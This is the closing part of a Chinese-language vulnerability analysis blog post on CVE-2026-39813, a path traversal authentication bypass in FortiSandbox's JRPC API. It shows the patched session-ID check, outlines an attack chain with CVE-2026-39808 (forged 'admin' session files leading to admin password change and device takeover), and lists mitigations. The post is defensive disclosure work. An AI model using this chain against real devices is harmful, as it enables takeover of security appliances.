        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre><span class="c1"># 4.4.9 修复后的 is_valid_session()
</span><span class="k">def</span> <span class="nf">is_valid_session</span><span class="p">(</span><span class="n">session_id</span><span class="p">,</span> <span class="n">remote_ip</span><span class="p">):</span>
    <span class="n">md5_pattern</span> <span class="o">=</span> <span class="sh">'</span><span class="s">^[a-fA-F0-9]{32}$</span><span class="sh">'</span>
    <span class="n">is_md5</span> <span class="o">=</span> <span class="nf">bool</span><span class="p">(</span><span class="n">re</span><span class="p">.</span><span class="nf">match</span><span class="p">(</span><span class="n">md5_pattern</span><span class="p">,</span> <span class="nf">str</span><span class="p">(</span><span class="n">session_id</span><span class="p">)))</span>

    <span class="k">if</span> <span class="ow">not</span> <span class="n">is_md5</span><span class="p">:</span>
        <span class="k">return</span> <span class="bp">False</span>  <span class="c1"># 只允许 32 位十六进制字符串
</span>
    <span class="n">fpath</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="n">DIRRPCSESS</span><span class="p">,</span> <span class="n">session_id</span><span class="p">)</span>
    <span class="c1"># ... 后续不变
</span></pre></td></tr></tbody></table></code></div></div>

<p>通过字节码对比确认：</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>4.4.8: Locals: 5  | Names: os, path, join, DIRRPCSESS, ...
4.4.9: Locals: 7  | Names: os, path, join, ..., bool, re, match, str
                     Constants: 新增 '^[a-fA-F0-9]{32}$'
</pre></td></tr></tbody></table></code></div></div>

<p>这个修复彻底解决了问题——合法 session ID 由 <code class="language-plaintext highlighter-rouge">secrets.token_hex(16)</code> 生成，固定为 32 位十六进制字符串，正则严格匹配该格式。</p>

<h2 id="与-cve-2026-39808-的关联"><span class="me-2">与 CVE-2026-39808 的关联</span><a href="#与-cve-2026-39808-的关联" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>CVE-2026-39813 与同一天公告的 CVE-2026-39808（命令注入，CVSS 9.1）组合可形成完整的攻击链：</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre>CVE-2026-39813（信息泄露）
  → 获取系统版本、序列号、配置信息
  → 确认目标是否为有价值的攻击目标
  → 下载加密备份（配合其他漏洞解密）

CVE-2026-39808（命令注入，已修复）
  → 在 /usr/rpcsess/ 创建伪造 session 文件（内容为 "admin"）
  → 绕过 CVE-2026-39813 中 has_admin_write_permission 的限制
  → 修改管理员密码，完全接管设备
</pre></td></tr></tbody></table></code></div></div>

<p>值得注意的是，CVE-2026-39813 <strong>完全不需要已知 RCE</strong>，纯 HTTP 请求即可触发信息泄露。相比之下，CVE-2026-39808 虽然更危险（root RCE），但需要能触发扫描才能利用。</p>

<h2 id="时间线"><span class="me-2">时间线</span><a href="#时间线" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>日期</th>
      <th>事件</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>2026-04-14</td>
      <td>Fortinet 发布 FG-IR-26-112 公告</td>
    </tr>
    <tr>
      <td>2026-04-14</td>
      <td>同时发布 CVE-2026-39808（FG-IR-26-111）</td>
    </tr>
    <tr>
      <td>2026-04-21</td>
      <td>固件逆向分析，复现漏洞</td>
    </tr>
    <tr>
      <td>2026-04-22</td>
      <td>独立验证 4.4.9 修复有效</td>
    </tr>
  </tbody>
</table></div>

<h2 id="缓解措施"><span class="me-2">缓解措施</span><a href="#缓解措施" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<ol>
  <li><strong>立即升级</strong>到 FortiSandbox 4.4.9 或 5.0.6+</li>
  <li>如果无法立即升级：
    <ul>
      <li>通过 WAF 规则阻断包含 <code class="language-plaintext highlighter-rouge">../</code> 的 JRPC 请求</li>
      <li>限制 <code class="language-plaintext highlighter-rouge">/jsonrpc/</code> 端点的网络访问（仅允许可信 IP）</li>
    </ul>
  </li>
  <li>检查日志中是否存在异常的 <code class="language-plaintext highlighter-rouge">/jsonrpc/</code> 请求</li>
</ol>

<h2 id="总结"><span class="me-2">总结</span><a href="#总结" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>CVE-2026-39813 是典型的路径遍历导致认证绕过漏洞——用户可控输入未经验证直接传入路径拼接函数，使得攻击者可以构造任意文件系统路径通过认证检查。该漏洞被评为 CVSS 9.1 的原因在于：信息泄露本身的影响范围广泛，且 FortiSandbox 作为网络安全产品，其被攻破后对所在网络的安全态势构成严重威胁。</p>

<p>该案例再次表明：即使存在自定义的认证体系，如果缺少基础输入验证，整个认证架构的安全性将无法得到保障。</p>

<h2 id="参考链接"><span class="me-2">参考链接</span><a href="#参考链接" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<ul>
  <li><a href="https://www.fortiguard.com/psirt/FG-IR-26-112">Fortinet PSIRT 公告 FG-IR-26-112</a></li>
  <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-39813">NVD CVE-2026-39813</a></li>
</ul>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/vulnerability/">vulnerability</a>
      </div>
    

    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/cve/"
            class="post-tag no-text-decoration"
          >CVE</a>
        
      </div>
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=CVE-2026-39813%20%E6%B7%B1%E5%BA%A6%E5%88%86%E6%9E%90%EF%BC%9AFortiSandbox%20JRPC%20API%20%E8%B7%AF%E5%BE%84%E9%81%8D%E5%8E%86%E8%AE%A4%E8%AF%81%E7%BB%95%E8%BF%87%20-%20imjdl%20blog&url=%2Fposts%2Fblog_cve_2026_39813_cn%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    

      

      <a href="https://www.facebook.com/sharer/sharer.php?title=CVE-2026-39813%20%E6%B7%B1%E5%BA%A6%E5%88%86%E6%9E%90%EF%BC%9AFortiSandbox%20JRPC%20API%20%E8%B7%AF%E5%BE%84%E9%81%8D%E5%8E%86%E8%AE%A4%E8%AF%81%E7%BB%95%E8%BF%87%20-%20imjdl%20blog&u=%2Fposts%2Fblog_cve_2026_39813_cn%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    

      

      <a href="https://t.me/share/url?url=%2Fposts%2Fblog_cve_2026_39813_cn%2F&text=CVE-2026-39813%20%E6%B7%B1%E5%BA%A6%E5%88%86%E6%9E%90%EF%BC%9AFortiSandbox%20JRPC%20API%20%E8%B7%AF%E5%BE%84%E9%81%8D%E5%8E%86%E8%AE%A4%E8%AF%81%E7%BB%95%E8%BF%87%20-%20imjdl%20blog" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>


            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/blog_cve_2026_39813_en/">CVE-2026-39813 Deep Dive Path Traversal Authentication Bypass in FortiSandbox JRPC API</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/blog_cve_2026_39813_cn/">CVE-2026-39813 深度分析：FortiSandbox JRPC API 路径遍历认证绕过</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/CVE-2026-31816-CN/">CVE-2026-31816  Budibase 认证绕过漏洞分析</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/CVE-2026-31816-EN/">CVE-2026-31816 Authentication Bypass Vulnerability</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/CVE-2026-24423-Technical-Analysis-EN/">CVE-2026-24423 SmarterMail ConnectToHub Unauthenticated Remote Code Execution Vulnerability</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->















  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/cve/">CVE</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/rce/">RCE</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/%E7%A9%BA%E9%97%B4%E6%B5%8B%E7%BB%98/">空间测绘</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/fortigate/">Fortigate</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ivanti/">IVanti</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/mcp/">MCP</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/palo-alto-networks-pan-os/">Palo-Alto-Networks-PAN-OS</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/showdoc/">ShowDoc</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/simplehelp/">SimpleHelp</a>
      
    </div>
  </section>


            </div>

            
              
              






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>


            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
    
  

  

  

  

  

  











  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/blog_cve_2026_39813_en/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1776746040"
  data-df="ll"
  
>
  Apr 21, 2026
</time>

              <h4 class="pt-0 my-2">CVE-2026-39813 Deep Dive Path Traversal Authentication Bypass in FortiSandbox JRPC API</h4>
              <div class="text-muted">
                <p>Background

On April 14, 2026, Fortinet published security advisory FG-IR-26-112 disclosing a critical path traversal vulnerability in FortiSandbox — CVE-2026-39813 (CVSS 9.1). The vulnerability af...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/CVE-2026-31816-EN/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1773289980"
  data-df="ll"
  
>
  Mar 12, 2026
</time>

              <h4 class="pt-0 my-2">CVE-2026-31816 Authentication Bypass Vulnerability</h4>
              <div class="text-muted">
                <p>Executive Summary

CVE-2026-31816 is a critical security vulnerability discovered in the Budibase low-code platform, with a CVSS score of 9.8 (Critical). This vulnerability consists of two componen...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/CVE-2026-31816-CN/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1773289980"
  data-df="ll"
  
>
  Mar 12, 2026
</time>

              <h4 class="pt-0 my-2">CVE-2026-31816  Budibase 认证绕过漏洞分析</h4>
              <div class="text-muted">
                <p>执行摘要

CVE-2026-31816 是 Budibase 低代码平台中发现的一个严重安全漏洞，CVSS 评分 9.8（严重）。该漏洞由两部分组成：


  认证绕过：由于正则表达式实现缺陷，攻击者可通过 URL 查询字符串绕过身份验证
  远程代码执行（RCE）：绕过认证后，攻击者可上传恶意插件实现服务器端任意代码执行


攻击链：未授权访问 → 插件上传 → DATASOURCE 插...</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            
              
              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
  

  
    <a
      href="/posts/CVE-2026-31816-EN/"
      class="btn btn-outline-primary"
      aria-label="Older"
    >
      <p>CVE-2026-31816 Authentication Bypass Vulnerability</p>
    </a>
  

  
    <a
      href="/posts/blog_cve_2026_39813_en/"
      class="btn btn-outline-primary"
      aria-label="Newer"
    >
      <p>CVE-2026-39813 Deep Dive Path Traversal Authentication Bypass in FortiSandbox JRPC API</p>
    </a>
  
</nav>

            

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2026</time>

    
      <a href="https://twitter.com/Mortyjin">Mortyjin</a>.
    

    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.2.4"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/cve/">CVE</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/rce/">RCE</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/%E7%A9%BA%E9%97%B4%E6%B5%8B%E7%BB%98/">空间测绘</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/fortigate/">Fortigate</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ivanti/">IVanti</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/mcp/">MCP</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/palo-alto-networks-pan-os/">Palo-Alto-Networks-PAN-OS</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/showdoc/">ShowDoc</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/simplehelp/">SimpleHelp</a>
      
    </div>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->


    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

